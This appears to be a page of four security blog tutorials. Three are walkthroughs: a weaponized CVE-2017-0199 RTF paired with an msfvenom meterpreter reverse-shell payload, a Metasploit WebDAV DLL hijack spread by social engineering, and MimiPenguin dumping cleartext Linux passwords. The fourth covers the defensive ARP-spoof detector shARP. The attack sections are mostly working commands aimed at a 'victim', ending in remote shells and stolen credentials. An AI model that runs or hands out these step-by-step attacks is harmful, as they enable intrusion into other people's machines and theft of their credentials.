Exploit Windows 10 PC with Microsoft RTF File (CVE-2017-0199)

Microsoft word is vulnerable against malicious RTF file, in this article we had made a zero day attack on MS- word 2013 using python script which will generate a malicious .rtf file and give meterpreter session of targeted system.

Exploit toolkit CVE-2017-0199 – v2.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious RTF file and deliver metasploit / meterpreter / any other payload to victim without any complex configuration.

Let’s start!!!

Attacker: Kali Linux

Target: Windows 10 (Microsoft Word 2007 – 2013)

Open the terminal inside your kali Linux and type following to down this script.

Git clone https://github.com/bhdresh/CVE-2017-0199.git

Cd CVE-2017-0199

python cve-2017-0199_toolkit.py -M gen -w sales.rtf -u

This command will run a python script to generate a rich text format payload where –M is used for generating rtf file –w is used for name of rtf file i.e. “sales.rtf” and –u for attacker’s IP address or domain name.

As you can figure out in the given screenshot that above command has generated a malicious sales .rtf file, now before we send this file to our victim we need to connect it with any backdoor file so that we can establish reverse connect with victim.

On a new terminal use msfvenom to prepare an exe payload for attack and type following.

Msfvenom –p windows/meterpreter/reverse_tcp lhost= lport=4444 –f exe > /root/Desktop/raj.exe

Now move raj.exe into /var/www/html.

Now type following command where it will merge raj.exe with sales.rtf. Then you have to share the updated rtf file with victim and start multi handler simultaneously for reverse connection of victims.

python cve-2017-0199_toolkit.py -M exp -e -l /var/www/html/raj.exe

When victim will open sales file which will be in doc format in that mean time attacker will receive his meterpreter ssession inside metasploite framework.

msf > use multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

meterpreter > sysinfo

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

How to Detect Sniffer in Your Network using shARP

This article is written to introduce a new lunch tool shARP is an anti-ARP-spoofing program and uses active scanning process to identify any ARP-spoofing event.

ARP spoofing allows an attacker to intercept data frames on a network, modify the traffic, or stop all traffic. Often the attack is used as an opening for other attacks, such as denial of service, man in the middle, or session hijacking attacks. Our anti- ARP spoofing program, (shARP) detects the presence of a third party in a private network actively. It has 2 mode: defensive and offensive.

Defensive mode protects the end user from the spoofer by disconnecting the user’s system from the network and alerts the user by an audio message.

Offensive mode disconnects the user’s system from the network and further kicks out the attacker by sending de-authentication packets to his system, unable him to reconnect to the network until the program is manually reset.

The program creates a log file (/usr/shARP/) containing the details of the attack such as, the attackers Mac address, Mac vendor time and date of the attack. We can identify the NIC of the attackers system with the help of the obtained Mac address. If required the attacker can be permanently banned from the network by feeding his Mac address to the block list of the router.

Let’s start!

Open the terminal in kali Linux and type following command to download it

Git clone https://github.com/europa502/shARP.git

If the user wants to secure his network by scanning for any attacker he can run the program. The program offers a simple command line interface which makes it easy for the new users. Now type following command to run this program:

 Chmod 777 shARP.sh

./sharp.sh -h

Then we had used zanti for sniffing in the network and start MIMT attack on selected target IP: so that we can view its network traffic.

When the user runs the program in defensive mode, As soon as the program detects a spoofer in the network, and it disconnects the user’s system from the network so as to protect the private data being transferred between the system and the server. It also saves a log file about the attacker for further use.

 ./sharp.sh –d eth0

From screenshot you can the highlighted text is showing the Mac address of android phone try to perform spoofing.

Now when it finds spoofing in the network, it disconnects the user from the network. From screenshot you can see now user is assign only its localhost IP.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Exploit Windows 7 PC using Torrent File

Through this article, you will learn WebDAV application DLL hijacking exploitation using Metasploit framework and try to hack the victim through malicious code execution.

Attacker: Kali Linux

Target: Window 7 (torrent)

Let’s start!!!

Open the terminal and type msfconsole to load metasploit framework.

This module presents a directory of file extensions that can lead to code execution when opened from the share. The default EXTENSIONS option must be configured to specify a vulnerable application type.

use exploit/windows/browser/webdav_dll_hijacker

msf exploit(webdav_dll_hijacker) >set payload windows/meterpreter/reverse_tcp

msf exploit(webdav_dll_hijacker) >set lhost

msf exploit(webdav_dll_hijacker) >set extensions torrent

msf exploit(webdav_dll_hijacker) >exploit

It has generate a malicious code which you can perceive from screenshot the highlighted text \\\documents\, so now being an attacker you are suggested to share this link to your targeted client using social engineering.

Once you have shared malicious code link to the client then must for your meterpreter session, now when client will open the link he will be intended to a document folder with many file extensions and attacker will receive his meterpreter session.

Hence meterpreter session 1 opened successfully now we are connected with target through port 4444.

msf exploit(webdav_dll_hijacker) >sessions 1

meterpreter> sysinfo


Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Dump Cleartext Password in Linux PC using MimiPenguin

Hello friends! Through this article we are introducing a new tool MINIPENUIN between us, which can utilize for fetching login of Linux system in same way as MIMIKATZ. 

A tool to dump the login password from the current linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz.

Takes advantage of clear text credentials in memory by dumping the process and extracting lines that have a high probability of containing cleartext passwords. Will attempt to calculate each word’s probability by checking hashes in /etc/shadow, hashes in memory, and regex searches.

Let’s begin

Open the terminal and type following command to download it from git hub.

Cd Desktop

git clone https://github.com/huntergregal/mimipenguin.git


cd mimipenguin

Now run the bash file to catch the clear text credential


From screenshot you can see I have got login credential root: toor.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Related Posts Plugin for WordPress, Blogger...